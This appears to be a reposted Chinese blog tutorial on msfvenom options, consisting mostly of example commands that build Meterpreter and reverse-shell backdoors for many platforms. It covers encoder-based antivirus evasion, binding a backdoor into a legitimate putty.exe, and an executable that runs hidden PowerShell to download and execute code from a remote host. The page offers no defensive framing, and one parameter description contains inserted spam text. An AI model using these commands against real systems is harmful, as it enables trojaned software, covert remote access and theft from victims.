Msfvenom参数实例分析


本篇文章给大家分享的是有关Msfvenom参数实例分析,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。参数说明:–p (– -payload-op免费云主机域名tions)添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!!(- -payload-options 列出payload选项)–l查看所有payload encoder nops。–f – -help-formats)输出文件格式。(- -help-formats 列出所有文件格式)Executable formats:asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, warTransform formats:bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript–e编码免杀。–a (– -platform – -help-platforms)选择架构平台x86 | x64 | x86_64Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe–o文件输出。–s生成payload的最大长度,就是文件大小。–b避免使用的字符 例如:不使用 ‘f’。–i编码次数。–c添加自己的shellcode。–x | -k捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。实例:实例1(简单生成):msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111 -f exe -o /Users/jiangzhehao/Downloads/1.exe-p 指定payload,payload后跟该payload的option;-o 指定payload的保存路径,包含文件名实例2(替换指定代码):msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111 -b ‘x00’ -f exe -o /Users/jiangzhehao/Downloads/1.exe-b ,–bad-char 替换代码中会出现中断的字符,如 ‘x00xff’实例3(指定编码器):msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111 -b ‘x00’ -e x86/shikata_ga_nai -f exe -o /Users/jiangzhehao/Downloads/1.exe-e 指定特定的编码器实例4(绑定后门到其他可执行程序上):msfvenom -p windows/meterpreter/reverse_http LHOST=172.16.0.102 LPORT=3333 -x /Users/jiangzhehao/Downloads/putty.exe -k -f exe -o /Users/jiangzhehao/Downloads/puuty_bind.exe -p windows/meterpreter/reverse_http LHOST=172.16.0.102 LPORT=3333 指定payload和payload的参数-x /Users/jiangzhehao/Downloads/putty.exe执行要绑定的软件-k从原始的注文件中分离出来,单独创建一个进程-f exe指定输出格式-o /Users/jiangzhehao/Downloads/puuty_bind.exe指定输出路径实例5 WindowsMsfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i3–e x86/shikata_ga_nai –f exe –o C:back.exeMsfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:back.exe实例6 Linuxmsfvenom-p linux/x86/meterpreter/reverse_tcpLHOST=LPORT=-f elf>shell.elf实例7 MACmsfvenom-p osx/x86/shell_reverse_tcpLHOST=LPORT=-f macho>shell.macho实例8 PHPmsfvenom-p php/meterpreter_reverse_tcpLHOST=LPORT=-f raw>shell.php实例9 Aspmsfvenom-p windows/meterpreter/reverse_tcpLHOST=LPORT=-f asp>shell.asp实例10 Aspxmsfvenom-p windows/meterpreter/reverse_tcpLHOST=LPORT=-f aspx>shell.aspx实例11 JSPmsfvenom-p java/jsp_shell_reverse_tcpLHOST=LPORT=-f raw>shell.jsp实例12 Warmsfvenom-p java/jsp_shell_reverse_tcpLHOST=LPORT=-f war>shell.war实例13 Bashmsfvenom-p cmd/unix/reverse_bashLHOST=LPORT=-f raw>shell.sh实例14 Perlmsfvenom-p cmd/unix/reverse_perlLHOST=LPORT=-f raw>shell.pl实例15 Pythonmsfvenom-p python/meterpreter/reverser_tcpLHOST=LPORT=-f raw>shell.py实例16 exe 利用exec执行powershell后门msfvenom -p windows/exec CMD=”powershell.exe -nop -w hidden -c $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring(‘http://192.168.0.104:8080/4WFjDXrGo7Mj’);” -f exe -e x86/shikata_ga_nai -i 6 -o msf.exe以上就是Msfvenom参数实例分析,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注云编程开发博客行业资讯频道。

相关推荐: 脚本助手之echo命令显示带指定颜色的字!

目的:脚本使用的时候,如果输出带颜色,可判断脚本哪里出了问题。echo 参数,可指明带颜色的字体。echo –help或者man echoecho显示带颜色,需要使用参数-e格式如下:echo -e “33[字背景颜色;文字颜色m字符串33[0m”例如:ec…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/06 13:12
下一篇 02/06 13:12